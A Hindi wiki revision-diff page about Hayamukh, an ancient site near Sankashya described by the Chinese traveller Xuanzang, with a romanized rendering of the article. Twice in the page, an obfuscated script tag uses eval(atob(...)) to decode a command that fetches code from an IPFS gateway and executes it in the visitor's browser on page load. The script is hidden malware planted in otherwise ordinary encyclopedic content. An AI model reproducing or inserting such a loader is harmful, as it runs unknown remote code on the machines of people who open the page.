Difference between revisions of "हयमुख"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
*[[सांकाश्य]] के निकट हयमुख पर चीनी यात्री [[युवानच्वांग]] ने 1000 बौद्ध भिक्षुओं की उपस्थिति का वर्णन किया है।
+
'''हयमुख''' प्रसिद्ध ऐतिहासिक स्थान [[सांकाश्य]] ([[एटा]], [[उत्तर प्रदेश]]) के निकट था। [[भारत]] की यात्रा पर आने वाले चीनी यात्री [[युवानच्वांग]] ने यहाँ 1000 [[बौद्ध]] भिक्षुओं की उपस्थिति का वर्णन किया है।
*यह सम्भवतः [[कान्यकुब्ज]] के निकट [[अश्वतीर्थ]] नामक स्थान था।
 
*[[कनिंघम]] ने इसका अभिज्ञान डोंडीखेड़ा नामक स्थान से किया है।
 
*जो [[प्रयाग]] से 104 मील उत्तर-पश्चिम में है।  
 
*बील ने इस अभिज्ञान को नहीं माना है।<ref>रेकाड्र्स ग्राव वेस्टर्न कंट्रीज 1,229</ref>
 
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
*हयमुख सम्भवतः [[कान्यकुब्ज]] (वर्तमान [[कन्नौज]]) के निकट [[अश्वतीर्थ]] नामक स्थान था।
 +
*[[कनिंघम]] ने इसका अभिज्ञान 'डोंडीखेड़ा' नामक स्थान से किया है, जो [[प्रयाग]] से 104 मील उत्तर-पश्चिम में है।
 +
*बील ने कनिंघम के उपर्युक्त अभिज्ञान को नहीं माना है।<ref>रेकाड्र्स ग्राव वेस्टर्न कंट्रीज 1,229</ref>
 +
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{विदेशी स्थान}}
+
{{उत्तर प्रदेश के ऐतिहासिक स्थान}}
[[Category:इतिहास कोश]]
+
[[Category:उत्तर प्रदेश]][[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]][[Category:इतिहास कोश]][[Category:ऐतिहासिक स्थान कोश]]
[[Category:विदेशी स्थान]]
 
 
 
 
__INDEX__
 
__INDEX__

Latest revision as of 08:17, 16 June 2013

hayamukh prasiddh aitihasik sthan saankashy (eta, uttar pradesh) ke nikat tha. bharat ki yatra par ane vale chini yatri yuvanachvaang ne yahaan 1000 bauddh bhikshuoan ki upasthiti ka varnan kiya hai.

  • hayamukh sambhavatah kanyakubj (vartaman kannauj) ke nikat ashvatirth namak sthan tha.
  • kaniangham ne isaka abhijnan 'doandikhe da' namak sthan se kiya hai, jo prayag se 104 mil uttar-pashchim mean hai.
  • bil ne kaniangham ke uparyukt abhijnan ko nahian mana hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. rekadrs grav vestarn kantrij 1,229

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>